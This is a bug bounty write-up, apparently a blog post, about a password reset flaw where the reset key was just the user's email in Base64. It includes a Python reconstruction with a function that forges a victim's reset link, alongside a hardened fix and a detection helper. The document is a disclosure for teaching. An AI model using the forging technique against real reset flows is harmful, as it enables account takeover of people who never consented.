One Easy and Funny Account Takeover
I just replaced my email ID with the victim's email ID, and boom!
Hello Folks, in this article I will explain one of my account takeover reports.
Let's get started!
I was hunting on the same program where I found "20K INR IDOR to Account Takeover".
This is one of my favorite P1 bugs so far, and the funny part is how easy the exploit is.
As usual, I was testing the password reset functionality. First I requested a password reset link for my own email ID to see what the backend was doing.
I copied the link that was sent to my email ID; it looked like this:
https://vulnapp.com/api/set_password?key=eitfgfdhfjdjjdfjd
Here I got a little curious about the parameter key=<token-value>.
I noticed that the value looked like Base64, so I sent it to Burp's Decoder and converted it to plain text.
Great!
It was nothing but the email ID I had used to request the password reset.
Behind the application, the key is just the email ID, Base64-encoded:
What the user sees: https://vulnapp.com/api/set_password?key=eitfgfdhfjdjjdfjd
Behind the scenes: https://vulnapp.com/api/set_password?key=attacker-id@gmail.com
OMG...
Immediately I created another account with a different email ID to act as the victim, and this time I replaced the key with the Base64 of the victim's email ID:
https://vulnapp.com/api/set_password?key=victim-id@gmail.com
which, converted to Base64, looks like:
https://vulnapp.com/api/set_password?key=hfagfdghitfgfdh
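To make the bug concrete, here is an added example (mine, not the program's code) that reconstructs the vulnerable design the write-up observed, key = Base64(email), next to a hardened design. The hardened version is an assumed fix, not the team's actual patch, which the write-up does not describe. The user store and the email addresses are constructed placeholders taken from the write-up; the helper at the end does in a script what the write-up did in Burp's Decoder: decode a reset key and flag it if an email address falls out.

```python
from __future__ import annotations

import base64
import hashlib
import secrets
import time

# Constructed, in-memory user store standing in for the target's backend.
USERS = {"attacker-id@gmail.com": {}, "victim-id@gmail.com": {}}


def _pad(key: str) -> str:
    """Restore the '=' padding that URLs usually strip."""
    return key + "=" * (-len(key) % 4)


# --- Vulnerable design reconstructed from the write-up: key = Base64(email) ---

def vulnerable_issue_key(email: str) -> str:
    """Reset 'token' that is just the email, Base64-encoded. No secret at all."""
    return base64.urlsafe_b64encode(email.encode()).decode().rstrip("=")


def vulnerable_verify_key(key: str) -> str | None:
    """Server side: decode the key and trust whatever email comes out."""
    try:
        email = base64.urlsafe_b64decode(_pad(key)).decode()
    except (ValueError, UnicodeDecodeError):
        return None
    return email if email in USERS else None


def forge_key(victim_email: str) -> str:
    """The whole exploit: anyone who knows the address can mint a valid key."""
    return vulnerable_issue_key(victim_email)


# --- Hardened design (assumed fix, not the program's real one) ---

TOKEN_TTL_SECONDS = 15 * 60
# sha256(token) -> (email, expiry). Only the hash is stored, so a leaked table
# does not hand out usable reset links.
_RESET_STORE: dict[str, tuple[str, float]] = {}


def _hash(token: str) -> str:
    return hashlib.sha256(token.encode()).hexdigest()


def hardened_issue_key(email: str, now: float | None = None) -> str:
    """256-bit random, single-use, expiring token; the email never appears in it."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    _RESET_STORE[_hash(token)] = (email, now + TOKEN_TTL_SECONDS)
    return token


def hardened_verify_key(key: str, now: float | None = None) -> str | None:
    """Look the token up by hash, consume it (single use) and enforce expiry."""
    now = time.time() if now is None else now
    entry = _RESET_STORE.pop(_hash(key), None)
    if entry is None:
        return None
    email, expiry = entry
    return email if now <= expiry else None


# --- Triage helper: the Burp Decoder step, as a script ---

def looks_like_encoded_email(key: str) -> bool:
    """Flag a reset key whose Base64 decoding contains an email address."""
    for decoder in (base64.urlsafe_b64decode, base64.b64decode):
        try:
            text = decoder(_pad(key)).decode()
        except (ValueError, UnicodeDecodeError):
            continue
        local, _, domain = text.partition("@")
        if local and "." in domain:
            return True
    return False


if __name__ == "__main__":
    forged = forge_key("victim-id@gmail.com")
    print("forged link:", f"https://vulnapp.com/api/set_password?key={forged}")
    print("backend resets account of:", vulnerable_verify_key(forged))
    print("key is an encoded email:", looks_like_encoded_email(forged))
```

Running the script prints a forged link that the vulnerable verifier happily resolves to the victim, while the same forged key is rejected by the hardened verifier because its hash is not in the store. The triage helper is the check worth running against every reset, unsubscribe or invite link you meet: if decoding the token yields an address, a username or a numeric ID, the token is predictable and the flow needs a closer look.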
Boom!
This is literally unbelievable; I had never seen such an easy and funny bug.
I did it!
I took over the victim's whole account, and all I needed was their email ID. A password reset token that is just an encoding of the email is no secret at all: anyone who knows the address can mint a valid link.
A really cool account takeover, found within a few minutes.
You may not find this kind of silly bug in your targets, but try to analyze and understand what is going on in the backend. It definitely helps you find all sorts of logical bugs.
And finally, I received the following response from the team.
Reported on: Feb 3rd, 2022
Fixed on: Feb 7th, 2022
Rewarded: Feb 21st, 2022
That's it for this write-up.
Happy Hacking!
Thanks for reading.
Please follow me for more writeups.